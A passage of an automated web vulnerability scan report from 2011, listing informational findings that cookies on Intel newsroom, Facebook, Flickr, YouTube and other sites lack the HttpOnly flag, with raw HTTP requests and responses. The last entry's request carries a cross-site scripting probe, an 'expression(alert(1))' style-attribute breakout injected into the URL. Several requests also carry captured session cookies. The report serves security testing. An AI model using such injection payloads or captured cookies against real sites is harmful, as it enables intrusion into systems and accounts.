Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323137373b332c323037373b332c323137393b332c333031313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323030363b31342c323031303b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:11 GMT; Path=/
X-JAL: 117
Content-Language: en-US
CacheHit: D=137232 t=1296947709400280
X-JSL: D=137238 t=1296947709400280
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.148. http://newsroom.intel.com/people/pdarling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/pdarling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c323037373b332c333031313b332c323137393b332c323137373b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031313b31342c323030373b31342c323031363b31342c323031303b31342c323030363b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:08 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/pdarling HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:06 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323037373b332c333031313b332c323137393b332c323137373b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031313b31342c323030373b31342c323031363b31342c323031303b31342c323030363b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:08 GMT; Path=/
X-JAL: 129
Content-Language: en-US
CacheHit: D=153068 t=1296947706373010
X-JSL: D=153074 t=1296947706373010
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.149. http://newsroom.intel.com/people/suzyintel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/suzyintel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c323137393b332c323037373b332c323137373b332c333031313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323031303b31342c323031363b31342c323030373b31342c323032373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/suzyintel HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323137393b332c323037373b332c323137373b332c333031313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323031303b31342c323031363b31342c323030373b31342c323032373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:11 GMT; Path=/
X-JAL: 79
Content-Language: en-US
CacheHit: D=89140 t=1296947709252096
X-JSL: D=89145 t=1296947709252096
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.150. http://objectivemarketer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://objectivemarketer.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/
  • ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: objectivemarketer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: User-Agent,Accept,Accept-Encoding
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/
Set-Cookie: ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/
Last-Modified: Sat, 05 Feb 2011 23:21:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

12.151. http://rss.intel.com/rss/intel-master-pressfeed.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /rss/intel-master-pressfeed.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • FGTServer=067F652F5A38F27A091593C46969DD9726772316; Version=1; Max-Age=3600
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss/intel-master-pressfeed.xml HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:33 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Sat, 05 Feb 2011 23:20:38 GMT
ETag: "20b8e1-66fdf-3f18dd80"
Accept-Ranges: bytes
Content-Length: 421855
Vary: Accept-Encoding
Content-Type: application/xml
Set-Cookie: FGTServer=067F652F5A38F27A091593C46969DD9726772316; Version=1; Max-Age=3600

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xml:base="http://mysmartchannels.com/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:itunes="http://www.itunes.com/dtds/p
...[SNIP]...

12.152. http://www.facebook.com/Intel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Intel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=PvG3c; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Intel HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:09 GMT
Content-Length: 43972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.153. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=nQPs-; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:08 GMT
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.154. http://www.flickr.com/apps/slideshow/show.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/slideshow/show.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/slideshow/show.swf HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Last-Modified: Mon, 21 Jun 2010 23:36:27 GMT
Accept-Ranges: bytes
Content-Length: 118333
X-Served-By: www144.flickr.mud.yahoo.com
Cache-Control: private
Connection: close
Content-Type: application/x-shockwave-flash

CWS    ....x..|.P.....s..d..$I. Y...s.9G.E@.$9o..9l..D.9'.$9l`..7...z.;.W.W.U.7U6{.{z..Y..ou....|..z.....s...?.^8..p21.S.......s...=..pqq.ceuwwgq.`.w2ge...e}..........i.b..l...N.G.....N.....vT...F...O..
...[SNIP]...

12.155. http://www.flickr.com/photos/intelphotos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/intelphotos

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
  • localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/intelphotos HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
X-Served-By: www40.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Intel Photos' Photostream</title>
   <meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

12.156. http://www.youtube.com/channelintel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /channelintel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /channelintel HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:31 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/das_captcha?next=/channelintel
Content-Type: text/html; charset=utf-8
Connection: close


12.157. http://www.youtube.com/view_play_list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /view_play_list

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /view_play_list HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://www.youtube.com/?ytsession=EDIPaPJ1NkCikKaHvniF7Tiz6vDWTKiQ2BjrzENMdu4p9NPioHcNGMGtxIJnyKsQ9R2I0ZskMRuPWAvsogbKJyMWdeu6E20vtaVqZVDrw7r_emQa58TecjXkS424salJlpG18NSZg1fKaRHRopstmT9udEtftazAtuYX5ENoz6ASKAmuR9gwuzmdsPgCvpW_exCnDvIgodEvClzCDA0RQe5zB9i1kM0ugB-9Pp7XUtYHjj1xXNi4E_xDKRXczWIf1KogmWn98Y7QdIm3PseAUQ
Content-Type: text/html; charset=utf-8
Connection: close


12.158. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT
  • GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT
Set-Cookie: GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=Uq4q39XF8n9pzVE7ljERwFoh2ir4kQlnCvFfi3V86wjgkCxlmb9pqK47ZeV_AeK8Gwi_mmTUJO6EE5ehEUFOiUOwnmac1YQ8wbPkBQA-K857ZGPA4gaFu591L_HP6SJNE6Hh7IwMMjOi6R-9ReRkQSMrxmsRjs1L7joKvo52BVGDZGuL-TQEmNaQhm9iYfu8CAZG9xN5aPSB4nCO3yweeBbU07vD6c26v_7TT7mnV8W0gTeCsoe37SpcCsl47vCTo9g2wt0u8Ri5yPMrqyNc2B7GXI0DyN3Ayh3nXEwYcOfb9eUQHoN_bQ
Connection: close


12.159. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078?AQB=1&ndh=1&t=5/1/2011%2019%3A58%3A9%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5%2Cevent9&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=1172&bh=684&ct=lan&hp=N&AQE=1 HTTP/1.1
Accept: */*
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
